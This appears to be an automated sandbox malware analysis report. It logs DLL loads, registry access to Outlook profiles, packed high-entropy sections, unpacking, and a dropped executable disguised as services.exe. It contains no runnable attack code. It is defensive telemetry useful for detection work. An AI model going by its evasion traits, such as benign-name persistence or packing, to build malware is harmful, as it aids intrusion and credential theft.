Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: mrmcorer.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: thumbcache.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: msi.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: feclient.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: msi.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: version.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: cabinet.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: msxml3.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: wldp.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: feclient.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: iertutil.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: wintypes.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: wintypes.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: wintypes.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: mscoree.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: msimg32.dll
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: borlndmm.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: wspconfig.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: mindclient.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: libglib-2.0-0.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: loudmouth.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: msi.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: version.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: wsock32.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: winmm.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: cc3260mt.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: stlpmt45.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: mpr.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: wsock32.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: version.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: oledlg.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: pla.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: pdh.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: tdh.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: cabinet.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: wevtapi.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: shdocvw.dll
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Section loaded: mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: random.exe

Static file information: File size 1876480 > 1048576

Source: random.exe

Static PE information: Raw size of durkfvqt is bigger than: 0x100000 < 0x19c000

Source:	Binary string: mozglue.pdbP source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2160323132.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: ntkrnlmp.pdbx, source: 0LGvvQO.exe, 00000030.00000002.2895898571.0000000009859000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\Benefit\Benefit\obj\Release\Benefit.pdb source: GWZ8arC.exe, 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp, GWZ8arC.exe, 00000013.00000000.2581657936.0000000000462000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3Xwk4R.exe, 0000002B.00000000.2770515108.0000000000B3B000.00000002.00000001.01000000.00000016.sdmp, w3Xwk4R.exe, 0000002B.00000002.2802414314.0000000000B3B000.00000002.00000001.01000000.00000016.sdmp, w3Xwk4R.exe, 0000002C.00000002.2796954947.0000000000BCB000.00000002.00000001.01000000.00000018.sdmp, w3Xwk4R.exe, 0000002C.00000000.2779208534.0000000000BCB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: d:\build\b-tivo-desktop-2-8-3\b-tivo-desktop-2-8-3\author\MindClient\Bin\MindClient.pdb source: TiVoServer.exe, 0000002D.00000002.2828781723.0000000000B48000.00000002.00000001.01000000.00000022.sdmp, TiVoServer.exe, 0000002D.00000003.2808610932.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, MindClient.dll.44.dr
Source:	Binary string: nss3.pdb@ source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, nss3.dll.1.dr
Source:	Binary string: C:\Users\Admin\source\repos\Benefit\Benefit\obj\Release\Benefit.pdbT=n= `=_CorExeMainmscoree.dll source: GWZ8arC.exe, 00000013.00000002.2751195208.0000000003999000.00000004.00000800.00020000.00000000.sdmp, GWZ8arC.exe, 00000013.00000000.2581657936.0000000000462000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\tmp\author\3rdParty\loudmouth-1.3\loudmouth\Release\loudmouth.pdb source: TiVoServer.exe, 0000002D.00000002.2830588395.0000000000BE1000.00000002.00000001.01000000.00000023.sdmp, TiVoServer.exe, 0000002D.00000003.2808050422.00000000007C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\build\b-tivo-desktop-2-8-3\b-tivo-desktop-2-8-3\author\wspconfig\Bin\wspconfig.pdb source: TiVoServer.exe, 0000002D.00000003.2813068341.00000000007C5000.00000004.00000020.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000002.2882291241.000000001006F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: 0LGvvQO.exe, 00000030.00000002.2895898571.0000000009859000.00000004.00000020.00020000.00000000.sdmp, 0LGvvQO.exe, 00000030.00000002.2895898571.000000000985D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: 0LGvvQO.exe, 00000030.00000002.2895898571.0000000009853000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: TiVoServer.exe, 0000002D.00000002.2872872363.0000000009DA0000.00000004.00000800.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000002.2869346565.0000000009A4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: TiVoServer.exe, 0000002D.00000002.2872872363.0000000009DA0000.00000004.00000800.00020000.00000000.sdmp, TiVoServer.exe, 0000002D.00000002.2869346565.0000000009A4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries.x86ret\bin\i386\Optimization\opt\bin\i386\vspkgs\msvb7.pdb source: w3Xwk4R.exe, 0000002C.00000002.2798497111.000000006B1A1000.00000020.00000001.01000000.0000001A.sdmp
Source:	Binary string: c:\tmp\author\3rdParty\loudmouth-1.3\loudmouth\Release\loudmouth.pdbl7 source: TiVoServer.exe, 0000002D.00000002.2830588395.0000000000BE1000.00000002.00000001.01000000.00000023.sdmp, TiVoServer.exe, 0000002D.00000003.2808050422.00000000007C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2159648203.000000006C5DF000.00000002.00000001.01000000.0000000D.sdmp, nss3.dll.1.dr
Source:	Binary string: mozglue.pdb source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2160323132.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: d:\build\b-tivo-desktop-2-8-3\b-tivo-desktop-2-8-3\author\MindClient\Bin\MindClient.pdbT source: TiVoServer.exe, 0000002D.00000002.2828781723.0000000000B48000.00000002.00000001.01000000.00000022.sdmp, TiVoServer.exe, 0000002D.00000003.2808610932.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, MindClient.dll.44.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Unpacked PE file: 1.2.K1T78D2510W1E77KV3WDUQ9M.exe.6b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dmhigkdj:EW;cihmvnxo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dmhigkdj:EW;cihmvnxo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Unpacked PE file: 3.2.VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.a30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xuipkqse:EW;ptzcvkgv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xuipkqse:EW;ptzcvkgv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.b10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xuipkqse:EW;ptzcvkgv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xuipkqse:EW;ptzcvkgv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 7.2.skotes.exe.b10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xuipkqse:EW;ptzcvkgv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xuipkqse:EW;ptzcvkgv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 11.2.skotes.exe.b10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xuipkqse:EW;ptzcvkgv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xuipkqse:EW;ptzcvkgv:EW;.taggant:EW;

.NET source code contains potential unpacker

Source: 13.2.KQlljCB.exe.23e5364b060.0.raw.unpack, DllHandler.cs	.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: 13.2.KQlljCB.exe.23e5364b060.0.raw.unpack, DllHandler.cs	.Net Code: DllNodeHandler

Source: 28qbTrm[1].exe.11.dr

Static PE information: 0xD238FA85 [Mon Oct 6 04:11:49 2081 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: services.exe.28.dr	Static PE information: real checksum: 0x0 should be: 0x3226c2
Source: 28qbTrm.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3226c2
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: real checksum: 0x1b8a31 should be: 0x1bc20d
Source: GWZ8arC[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5f08e
Source: 0LGvvQO.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x15bf4
Source: 0LGvvQO[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x15bf4
Source: spoDnGT[1].exe.11.dr	Static PE information: real checksum: 0x206639 should be: 0x209861
Source: kzTq7Bt[1].exe.11.dr	Static PE information: real checksum: 0x1c5b98 should be: 0x1cb20c
Source: KQlljCB.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x86457
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: real checksum: 0x20fa90 should be: 0x2149b6
Source: 28qbTrm[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3226c2
Source: random.exe	Static PE information: real checksum: 0x1cf2dc should be: 0x1d13c0
Source: kzTq7Bt.exe.11.dr	Static PE information: real checksum: 0x1c5b98 should be: 0x1cb20c
Source: KQlljCB[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x86457
Source: GWZ8arC.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x5f08e
Source: skotes.exe.3.dr	Static PE information: real checksum: 0x20fa90 should be: 0x2149b6
Source: spoDnGT.exe.11.dr	Static PE information: real checksum: 0x206639 should be: 0x209861

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: durkfvqt
Source: random.exe	Static PE information: section name: kbhejnhj
Source: random.exe	Static PE information: section name: .taggant
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name:
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name: .idata
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name:
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name: dmhigkdj
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name: cihmvnxo
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name: .taggant
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name:
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name: .idata
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name:
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name: xuipkqse
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name: ptzcvkgv
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: skotes.exe.3.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name: .idata
Source: skotes.exe.3.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name: xuipkqse
Source: skotes.exe.3.dr	Static PE information: section name: ptzcvkgv
Source: skotes.exe.3.dr	Static PE information: section name: .taggant
Source: 28qbTrm[1].exe.11.dr	Static PE information: section name: .iat
Source: 28qbTrm.exe.11.dr	Static PE information: section name: .iat
Source: spoDnGT[1].exe.11.dr	Static PE information: section name:
Source: spoDnGT[1].exe.11.dr	Static PE information: section name: .idata
Source: spoDnGT[1].exe.11.dr	Static PE information: section name:
Source: spoDnGT[1].exe.11.dr	Static PE information: section name: yfwtsime
Source: spoDnGT[1].exe.11.dr	Static PE information: section name: grnmymoh
Source: spoDnGT[1].exe.11.dr	Static PE information: section name: .taggant
Source: spoDnGT.exe.11.dr	Static PE information: section name:
Source: spoDnGT.exe.11.dr	Static PE information: section name: .idata
Source: spoDnGT.exe.11.dr	Static PE information: section name:
Source: spoDnGT.exe.11.dr	Static PE information: section name: yfwtsime
Source: spoDnGT.exe.11.dr	Static PE information: section name: grnmymoh
Source: spoDnGT.exe.11.dr	Static PE information: section name: .taggant
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name:
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name: .idata
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name:
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name: wdhelxkr
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name: nwhkdcaa
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name: .taggant
Source: kzTq7Bt.exe.11.dr	Static PE information: section name:
Source: kzTq7Bt.exe.11.dr	Static PE information: section name: .idata
Source: kzTq7Bt.exe.11.dr	Static PE information: section name:
Source: kzTq7Bt.exe.11.dr	Static PE information: section name: wdhelxkr
Source: kzTq7Bt.exe.11.dr	Static PE information: section name: nwhkdcaa
Source: kzTq7Bt.exe.11.dr	Static PE information: section name: .taggant
Source: KQlljCB[1].exe.11.dr	Static PE information: section name: .fptable
Source: KQlljCB.exe.11.dr	Static PE information: section name: .fptable
Source: w3Xwk4R[1].exe.11.dr	Static PE information: section name: .wixburn
Source: w3Xwk4R.exe.11.dr	Static PE information: section name: .wixburn
Source: GWZ8arC[1].exe.11.dr	Static PE information: section name: .iat
Source: GWZ8arC.exe.11.dr	Static PE information: section name: .iat
Source: services.exe.28.dr	Static PE information: section name: .iat

Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_05A07D93 push BECC9122h; ret		0_3_05A07D98
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_05A07747 push BECC9122h; ret		0_3_05A0774C

Source: random.exe	Static PE information: section name: entropy: 7.983763948621804
Source: random.exe	Static PE information: section name: durkfvqt entropy: 7.953438165898744
Source: K1T78D2510W1E77KV3WDUQ9M.exe.0.dr	Static PE information: section name: dmhigkdj entropy: 7.95384902491981
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name: entropy: 7.070716443897377
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe.0.dr	Static PE information: section name: xuipkqse entropy: 7.953007879763035
Source: skotes.exe.3.dr	Static PE information: section name: entropy: 7.070716443897377
Source: skotes.exe.3.dr	Static PE information: section name: xuipkqse entropy: 7.953007879763035
Source: spoDnGT[1].exe.11.dr	Static PE information: section name: entropy: 7.179411039126327
Source: spoDnGT[1].exe.11.dr	Static PE information: section name: yfwtsime entropy: 7.953399466719559
Source: spoDnGT.exe.11.dr	Static PE information: section name: entropy: 7.179411039126327
Source: spoDnGT.exe.11.dr	Static PE information: section name: yfwtsime entropy: 7.953399466719559
Source: kzTq7Bt[1].exe.11.dr	Static PE information: section name: wdhelxkr entropy: 7.951590044849145
Source: kzTq7Bt.exe.11.dr	Static PE information: section name: wdhelxkr entropy: 7.951590044849145

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe

File created: C:\Users\user\AppData\Roaming\SubDir\services.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	File created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Vcl60.bpl	Jump to dropped file
